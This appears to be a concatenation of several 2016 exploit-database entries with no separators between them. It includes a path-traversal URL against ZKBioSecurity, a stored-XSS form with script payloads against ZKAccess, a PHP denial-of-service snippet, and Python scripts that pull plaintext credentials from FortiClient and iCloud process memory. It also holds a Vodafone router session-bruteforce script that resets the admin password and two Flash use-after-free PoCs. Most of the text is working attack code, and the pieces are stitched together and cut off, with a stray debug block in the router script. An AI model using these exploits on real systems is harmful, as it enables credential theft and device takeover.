Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: File path manipulation vulnerabilities arise when user-controllable data
is placed into a file or URL path that is used on the server to access
local resources, which may be within or outside the web root. An attacker can
modify the file path to access different resources, which may contain sensitive
information. Even where an attack is constrained within the web root, it is often
possible to retrieve items that are normally protected from direct access, such
as application configuration files, the source code for server-executable scripts,
or files with extensions that the web server is not configured to serve directly.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5365
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php
18.07.2016
--
http://127.0.0.1:8088/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml
<!--
ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 5.3.12252
Summary: ZKAccess Systems are built on flexible, open technology to provide
management, real-time monitoring, and control of your access control system-all
from a browser, with no additional software to install. Our secure Web-hosted
infrastructure and centralized online administration reduce your IT costs and
allow you to easily manage all of your access points in a single location. C3-100's
versatile design features take care of present and future needs with ease and
efficiency. It is one of the most rugged and reliable controllers on the market,
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
cardholders.
Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.
Tested on: CherryPy/3.1.0beta3 WSGI Server
Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
Python 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5368
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
18.07.2016
-->
<html>
<body>
<form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
<input type="hidden" name="pk" value="None" />
<input type="hidden" name="holiday_name" value=""><script>alert(1)</script>" />
<input type="hidden" name="holiday_type" value="1" />
<input type="hidden" name="start_date" value="09/13/2016" />
<input type="hidden" name="end_date" value="10/18/2016" />
<input type="hidden" name="loop_by_year" value="2" />
<input type="hidden" name="memo" value=""><script>alert(2)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<?php
#############################################################################
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class jsonTmp implements JsonSerializable {
function jsonSerialize() {
$jsonTmp = new jsonTmp();
return $jsonTmp;
}
}
json_encode(new jsonTmp());
?>
'''
Title : Extracting clear text passwords from running processes(FortiClient)
CVE-ID : none
Product : FortiClient SSLVPN
Service : FortiTray.exe
Affected : <=5.4
Impact : Critical
Remote : No
Website link : http://forticlient.com/
Reported : 31/08/2016
Authors : Viktor Minin https://1-33-7.com
Alexander Korznikov http://korznikov.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
In our research which involved this program we found that this process store the credentials that you supplied for connecting, in clear text in the process memory.
In this situation a potential attacker who hacked your system can reveal your Username and Password steal and use them.
This may assist him in gaining persistence access to your Organization LAN network.
'''
from winappdbg import Debug, Process, HexDump
import sys
filename = "FortiTray.exe" # Process name
search_string = "fortissl" # pattern to get offset when the credentials stored
# Searching function
def memory_search( pid, strings ):
process = Process( pid )
mem_dump = []
######
# You could also use process.search_regexp to use regular expressions,
# or process.search_text for Unicode strings,
# or process.search_hexa for raw bytes represented in hex.
######
for address in process.search_bytes( strings ):
dump = process.read(address-10,800) #Dump 810 bytes from process memory
mem_dump.append(dump)
for i in mem_dump:
if "FortiClient SSLVPN offline" in i: #print all founds results by offsets to the screen.
print "\n"
print " [+] Address and port to connect: " + str(i[136:180])
print " [+] UserName: " + str(i[677:685])
print " [+] Password: " + str(i[705:715])
print "\n"
debug = Debug()
try:
# Lookup the currently running processes.
debug.system.scan_processes()
# Look for all processes that match the requested filename...
for ( process, name ) in debug.system.find_processes_by_filename( filename ):
pid = process.get_pid()
memory_search(pid,search_string)
finally:
debug.stop()
#####
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.apple.com/
# Product Homepage @ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
usr = ''
pwd = ''
found = 0
filename = "iCloud.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "#########################################################################"
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address,50))
try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass
memory_dump = []
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address,60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except:
pass
if usr != '' and pwd !='':
found = 1
print "[+] iCloud Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
import urllib2
import json
from datetime import datetime, timedelta
import time
import httplib
from threading import Thread
from Queue import Queue
from multiprocessing import process
print """
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
"""
thread_lock = False
session = ""
def unix_time_millis(dt):
epoch = datetime.utcfromtimestamp(0)
return int(((dt - epoch).total_seconds() * 1000.0) / 1000)
a=False
def check_process_output():
print 1
p = process.Process(target=check_process_output)
p.start()
print a
exit(0)
def crack(queue):
global thread_lock
global session
while True:
if thread_lock:
exit(0)
if not queue.empty():
cookie = queue.get()
headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie}
req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s"
% time.time(), None, headers)
result = urllib2.urlopen(req).read()
if json.loads(result)["AuthMode"] != "":
print "[+] Found valid admin session!"
print "[INFO] Terminating other threads ... please wait"
session = cookie
queue.task_done()
thread_lock = True
def start_threads_with_args(target, n, arg):
thread_pool = []
for n_threads in range(0, n):
thread = Thread(target=target, args=(arg,))
thread_pool.append(thread)
thread_pool[-1].start()
return thread_pool
def start_bruteforce():
global session
global thread_lock
queue = Queue(0)
start_threads_with_args(crack, 15, queue)
print"[!] Trying fast bruteforce..."
for x in range(0, 1000):
if thread_lock:
break
queue.put("123abc456def789%03d" % x)
while True:
if session != "":
return session
if queue.empty():
break
print "[!] Trying slow bruteforce..."
for milliseconds in range(0, how_many):
if thread_lock:
break
queue.put("123abc456def789%s" % (start + milliseconds))
while True:
if session != "":
return session
if queue.empty():
break
return session
if __name__ == "__main__":
now = datetime.now()
hours = raw_input("How many hours ago admin logged in: ")
minutes = raw_input("How many minutes ago admin logged in: ")
init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
start = unix_time_millis(init)
how_many = unix_time_millis(end) - start + 1
print "[+] Starting session bruteforce with 15 threads"
valid_session = ""
try:
valid_session = start_bruteforce()
except KeyboardInterrupt:
print "[-] Exiting.."
thread_lock = True
exit(0)
if valid_session == "":
print "[!] Can't find valid session :( quitting..."
exit(0)
print "[+] Resetting router password to 'admin' , network may be down for a while"
headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session}
req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process",
"goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
try:
urllib2.urlopen(req).read()
except httplib.BadStatusLine:
print "[!] Password resetted to admin! have fun!"
exit(0)
except Exception:
print "[x] Error during password reset"
print "[-] Can't reset password try manually, your session is: %s" % valid_session
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845
There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform.
A minimal PoC is as follows:
this.createEmptyMovieClip( "mc", 1);
var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4);
var t:Transform = new Transform( mc );
t.colorTransform = c;
this.createTextField( "tf", 2, 0, 0, 2000, 200);
var ct = ColorTransform;
var g = flash.geom;
g.addProperty("ColorTransform", func, func);
var q = t.colorTransform;
tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color;
function func(){
mc.removeMovieClip();
return ct;
}
A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40355.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846
If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows:
var mc = this.createEmptyMovieClip( "mc", 1);
mc.addProperty( "f", func, func );
mc.f("hello");
function func(){
mc.removeMovieClip();
// Fix heap
var d:Date = new Date();
return d.getDate;
}
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40356.zip